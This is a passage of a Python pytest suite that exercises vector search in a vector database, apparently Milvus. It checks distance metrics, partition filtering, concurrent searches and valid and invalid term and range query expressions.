search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query, partition_names=["(.*)tag"])
assert not check_id_result(res[0], ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_names=["new(.*)"])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
def test_search_collection_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, query)
@pytest.mark.level(2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.level(2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
'''
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
@pytest.mark.skip("r0.3-test")
def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
"""
target: test search with field, and let return entities less than topk
method: insert entities and build ivf_ index, and search with field, n_probe=1
expected:
"""
entities, ids = init_data(connect, id_collection, auto_id=False)
simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
connect.create_index(id_collection, field_name, simple_index)
# logging.getLogger().info(connect.get_collection_info(id_collection))
top_k = 300
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
search_params={"nprobe": 1})
expr = {"must": [gen_default_vector_expr(default_query)]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(id_collection)
res = connect.search(id_collection, query, fields=["int64"])
assert len(res) == nq
for r in res[0]:
assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
@pytest.mark.level(2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
@pytest.mark.level(2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
limit = default_nb // 2
for i in range(nq):
for result in res[i]:
logging.getLogger().info(result.id)
assert result.id in ids[:limit]
# TODO:
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, with parts of term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(
values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
# TODO:
@pytest.mark.level(2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, with the same values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: return null
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_complex_dsl(self, connect, collection):
'''
method: query with complicated dsl
expected: no error raised
'''
expr = {"must": [
{"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
{"must": [gen_default_vector_expr(default_query)]}
]}
logging.getLogger().info(expr)
query = update_query_expr(default_query, expr=expr)
logging.getLogger().info(query)
connect.load_collection(collection)
res = connect.search(collection, query)
logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == default_nb
connect.flush([collection_term])
# count = connect.count_entities(collection_term)
# assert count == default_nb
stats = connect.get_collection_stats(collection_term)
assert stats["row_count"] == default_nb
term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection_term)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
connect.drop_collection(collection_term)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields term, one of it not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
@pytest.mark.level(2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multi term with same field, and values has common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float",
values=[float(i) for i in range(default_nb // 2, default_nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build query with multi term, different field each term
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(default_nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(default_nb // 2, default_nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges has common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
